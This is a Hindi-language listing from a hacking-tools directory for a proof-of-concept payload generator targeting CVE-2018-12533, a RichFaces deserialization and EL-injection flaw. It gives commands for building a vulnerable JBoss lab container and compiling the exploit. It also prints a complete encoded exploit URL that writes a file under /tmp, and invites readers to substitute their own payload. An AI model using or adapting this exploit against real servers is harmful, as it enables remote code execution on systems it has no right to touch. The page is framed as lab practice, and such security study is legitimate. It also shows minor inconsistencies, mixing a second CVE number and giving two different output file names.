Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2018-12533 — RF-14310 / CVE-2018-12533 - पेलोड जनरेटर | Kitploit
उपकरण/GitHubGitHub/llamaonsecurity/cve-2018-12533
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेपर और शोधपेलोड डेवलपमेंटलैब और अभ्यास
GitHubllamaonsecurity/cve-2018-12533

CVE-2018-12533

RF-14310 / CVE-2018-12533 - पेलोड जनरेटर

रिपॉजिटरी देखें
9114 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

RF-14310 / CVE-2018-12533 पेलोड जनरेटर

Lucifaer शोध पर आधारित

सारा श्रेय https://github.com/Lucifaer को जाता है

संदर्भ

https://access.redhat.com/security/cve/cve-2018-12533

richfaces-jboss-poc

पुराने Java संस्करणों आदि के बारे में अधिक चिंता किए बिना, Richfaces 3.3.4 deserialization + EL injection शोषण का अभ्यास करने के लिए आसानी से तैनात होने वाला प्रूफ ऑफ कॉन्सेप्ट।

jboss Docker तैनात करें

आपको एक कमजोर (असुरक्षित) एप्लिकेशन सेट अप करने की परेशानी से बचाने के लिए, मैंने CVE-2018-14667 की व्याख्या करने वाले seclist लेख के निर्देशों के आधार पर एक Dockerfile बनाई है। बस रिपॉजिटरी की मूल निर्देशिका में निम्नलिखित कमांड चलाएँ:

root@kitploit:~
docker build -t richfaces-jboss .
docker run -p 8081:8080 richfaces-jboss

यदि सब कुछ ठीक रहा, तो आप richfaces photoalbum परीक्षण एप्लिकेशन को http://127.0.0.1:8081/photoalbum पर एक्सेस कर सकते हैं।

रूट रिपॉजिटरी निर्देशिका से poc को फैट jar में संकलित करें (docker और कार्यशील pom के साथ आसान)

root@kitploit:~
cd CVE-2018-12533
docker run -v ~/.m2:/root/.m2 -v $(pwd):/usr/src/app maven:3.5-jdk-8 mvn -f /usr/src/app/pom.xml clean package install

POC URL जनरेट करें

root@kitploit:~
java -jar target/cve_2018_12533.jar

jboss सर्वर पर URL पर जाएँ

यदि आप /tmp में फ़ाइल बनाने के अलावा कुछ और करना चाहते हैं, तो /DATA/XXXXX भाग को अपने पेलोड से बदलें। यह पेलोड /tmp/hacked.txt बनाता है। http://127.0.0.1:8081/photoalbum/a4j/s/3_3_3.Finalorg.richfaces.renderkit.html.Paint2DResource/DATA/eAHNUk1r1UAUnfegVq2L-oEiItQo-goyKSJu6gOxFX2QWukTwbp4zEtuk2knM-nkpo0W3Qmi4satIOJKUBD9Be6k4KY!QQRxIYggLvVOUlssuDebXGbOnHPuufflVzaQW3bG2JhbGSZzIoScW9AR2AWJPMFU8StCajw1OQO5KWwIxzqpiGFSoGi!X!s4!OvF6yYb7LDtvX48YZSxHTbYmzM2FeiqBGScULWttywjTGbZjlCECYi-goAN9CKiQbYnmBdLwldCx!50fx5CHA!oReaEF9kd1igzVn9N-pWMNU6yjHwfd89KXrsOTZoZDRp5lzjhklHURFcsgb2--rb9-MmHqSZrBqSvRJ5fFin8rdtFK3VMujtzehNVHMj2186k8btgpVDylnM-XmZO!gRJ8rzQlQEFmHNQPIBYhDenABMTnZc6ItJ1740mawSskSI7VLGWPii!Bl4oMwt5Lo0m6n8xXxXxVvQf5l2UimUH6zjIxFbcG3!1waefpx9RfITbu4Hb1H1-9373--zaWYdwDo64lZjvm7xqaitfJ81U!9uBH0Pvdk85bTekoeWH7N7RFQuLBeTIY8AJl3RrdKMMjKCR0IGior70nBXuBs9nCo0yBa!C14Itj1g2z6VeMgvQ0oVSoxxKCFsemiJMRnxMMz8R4QJEHEv0Rm8zVlCfN6qca!r1-b5au!b5y-GVi1WfFF8T2b7KgzR8usCsQAKCoCENb1qrdzLLyuVn7OnIubGTYyNtLyQYwoTRSDvX!l8a98rfWVxP3w__.jsf

पेलोड की सफलता का विश्लेषण करने के लिए एक अलग टर्मिनल में शेल खोलें

root@kitploit:~
docker ps
docker exec -it <containerid> bash
ls /tmp

जब आप एक्सप्लॉइट को बिना किसी बदलाव के उपयोग करते हैं, तो यह /tmp/cve_2018_12533 बनाएगा, इस तरह आप पुष्टि कर सकते हैं कि एक्सप्लॉइट काम किया या नहीं।

टूल डाउनलोड करें